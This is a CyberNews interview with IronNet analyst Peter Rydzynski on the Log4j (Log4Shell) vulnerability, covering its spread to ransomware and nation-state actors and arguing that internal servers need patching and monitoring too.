Log4j: protecting only remotely accessible servers is a mistake - opinion

It's been almost two weeks since the severe vulnerability in the Log4j logging library was publicly disclosed. We are starting to see more severe consequences, but the problem hasn't yet peaked.

Since the beginning of the public debate on the vulnerability, dubbed Log4Shell, experts have been speculating that this is the Fukushima moment for cybersecurity. They anticipate that the consequences might be severe, but we might not learn about the magnitude of this cybersecurity earthquake for months.

CyberNews caught up with Peter Rydzynski, principal threat Analyst for IronNet Cybersecurity, to discuss how the situation has developed over the past two weeks.

It's been almost two weeks since the severe vulnerability in the Log4j logging library was discovered. What happened during that period? How bad is it?

Firstly, the reason it is so severe is partially because of the ubiquitous use of Java applications all over the place, and, additionally, the use of the Log4j library, specifically, within Java applications. Given the fact that it is used in so many locations, and then combined with the fact that, in this case, the exploit was incredibly trivial. You could even show the exploit strain to someone who wasn't in computer science or computer security. They could probably understand basically what it does and how it can figure it to do something they want it to do. Very simple to execute. Additionally, the delivery mechanism, because you could deliver the exploit from remote areas of the internet, also made it incredibly severe.

As all things go, patch processes took place, we had a fixed version of Log4j that was released, and almost immediately, we found out that version was still vulnerable. And so, it was a typical game of every time you think you are good, and you've patched up to a particular version that's secure, you are still not secure. And we are chasing this vulnerability all the way to the point where they actually deactivated the feature entirely. That vulnerable feature has now been completely removed from the Log4j library.

Does the fact that it is disabled prevent you from cyberattacks?

Just because there is a secure version doesn't mean it is easy to get to that version, and it also doesn't mean that it is easy for you to know where all of the Log4j applications are in your network.

What happened during these past weeks? We saw crypto miners starting to exploit the vulnerability, nation-states jumping in, ransomware gangs eyeing the vulnerability, and even the Belgian defense ministry falling victim to a cyberattack allegedly caused by this vulnerability.

I think that more will definitely come to light as time goes on because, with these kinds of exploitations, you see very rapid adoption by botnets and crypto mining. And we definitely saw that. We saw things attempting to spread across the internet like Mirai that have done that for a long time using similar exploits. They have picked this up quickly. But nation-states and more sophisticated actors need a little bit of time to work these new exploits into their operations and for those things to come to light. I think we are going to see more of that. We are seeing now that the Conti ransomware group has adopted this exploit in their operations, so that's another concern: that ransomware is absolutely a viable delivery here. Because given the nature of the exploit, you are often going to land on a server that isn't being monitored as heavily as maybe a host end-point. Additionally, that may have more broad access into the network and move laterally very easily from that landing point on a server. Ransomware is a strong concern here.

But even those companies that have patched might still be vulnerable as the attacker might already be inside their network, right?

Another concern here is not just that an attacker had already exploited your server and moved on to other locations within your network before you were able to patch. Still, a bigger concern is actually on the side of information stealing. People may think that they are ok because they didn't see any subsequent command-and-control activity or lateral movement, but what they didn't realize is that the attacker used the DNS mechanism that's capable within this exploit and exfiltrated sensitive environment variables that include passwords that an attacker can use later to come back and attack your network at their pleasure.

There are a lot of angles to this. Just patching and thinking that you are safe after having a server exposed to the internet is not a good idea.

You've mentioned that sophisticated threat actors might need time to fit this vulnerability into their attack vectors. On average, it takes 14 weeks even to detect an intruder. Does it mean that we are yet to learn about the significance and severity of this vulnerability, as well as the actual damage it caused?

I believe that they are ongoing. At the moment, we've already had indications that nation-states are leveraging this exploit, but I will say that we might never learn about these kinds of attacks in full scope. But yes, these things take time. If you look at any of the reports out of Mandiant, FireEye, and other organizations that do incident response for the government, you will notice that these reports typically come six to nine months after the activity was discovered by defensive companies, let alone when the activity started in those networks. These things take time, and, additionally, we may not actually hear the full scope of them as well.

You said that patching is not enough. What should companies additionally do to stay safe?

What really should be done in cases like this is what you should be doing all the time, not just when Log4j happens. You should be assuming a posture of 'I have already been attacked at all times.' You should already expect that you are compromised at all times. You should essentially have plans to ensure that you have the appropriate processes documented so that when you discover a threat actor in your network, you can take action. Furthermore, you need to have monitoring systems that pay attention to the internal portions of your network. You can't just watch the edge, and you can't just watch the firewall and say, 'hey, we saw these Log4j exploits, but we've patched them, and we are good,' and then not take a look inside and start monitoring traffic, hosts, looking for lateral movement, looking for the second-stage activities that are going to happen after an exploit is successful on your edge.

Again, this is something you should be doing all the time, not just because Log4j is happening now, but you can see how important it is to have adopted this strategy all the time when Log4j happens. If you haven't, if you are too late at this point, you need to have these things in place already and have network traffic analysis tools that you can see, 'hey, who was touching my servers, what did my servers do after these malicious attackers touched them."

Do you think enough companies are patching the vulnerability? We saw with the Microsoft Exchange Servers that there were still tens of thousands of unpatched servers weeks after discovering the bug.

I think the attention on this particular incident has been incredible. I think that a good majority of people are patching. But I will speculate on as far as my fears go. People think the edges are the priority, which they are. They believe that anything that can be hit from the internet should be patched, but the inside can wait. And what happens is sometimes those things would get forgotten or even intentionally overlooked because they will be assumed as a risk that is not big enough to take action on. I hope that doesn't happen because this is a goldmine for an attacker who's already in the network. It might be tempting for defenders to say, 'that's not remotely accessible, no one's going to attack that server, it's only accessible to internal employees, it's no big deal.' In reality, an attacker could very simply access and exploit a server inside the network. You might think that it is not a priority, but I think it is a priority across every portion of your network, even the most sensitive enclaves that are restricted access only.

More from CyberNews:

Apache found critical bugs in httpd web server

Americans bombarded with billions of scam calls in 2021 - report

Five Russians charged millions for hacking and insider trading

Novel Abcbot starts targeting CSPs, a signal of a future DDoS attack

Most corporate networks can be breached in two days - research

Subscribe to our newsletter

Leave a Reply

Your email address will not be published. Required fields are markedmarked